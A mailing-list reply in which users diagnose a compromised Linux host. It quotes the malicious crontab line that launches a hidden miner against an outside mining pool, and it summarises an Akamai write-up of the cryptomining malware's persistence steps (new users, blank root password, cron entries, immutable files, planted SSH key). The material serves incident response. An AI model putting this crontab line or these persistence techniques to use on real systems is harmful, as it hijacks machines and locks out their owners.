James Knott wrote:
On 2021-03-02 4:46 p.m., Carlos E.R. wrote:
Well, I have removed that crontab line, so it won't be trying to start again. Ah, you removed a crontab line! You did not tell us that. What line, where exactly?
2 * * * * /home/test/.dhpcd -o ca.minexmr.com:4444 -B >/dev/null ^^^^^^^^^^^^^^^^^^^
That is a useful hint - it led me to this: https://blogs.akamai.com/sitr/2020/04/a-brief-history-of-a-rootable-docker-i... As also expected when this project first started, the docker image was a prime target for crypto-mining malware. An installation script is run via SSH that monitors the process tree with "top" - a process monitoring tool - checking for when the malware has successfully been executed. Once the process is detected, in this case it is "dhcpcd", the malware adds two new users to the system - test and test1. It changes the root password to ""(blank) and creates entries in cron to start the mining software up after a reboot. It also attempts to set the immutable bit (+i) on various files including /etc/shadow and the malware binary in /sbin/dhcpcd. The malware also adds a .ssh key to /root/.ssh/authorized_keys: ssh-rsa .......... The mining software reports as XMRig v5.2.0. -- Per Jessen, Zürich (5.5°C) http://www.cloudsuisse.com/ - your owncloud, hosted in Switzerland.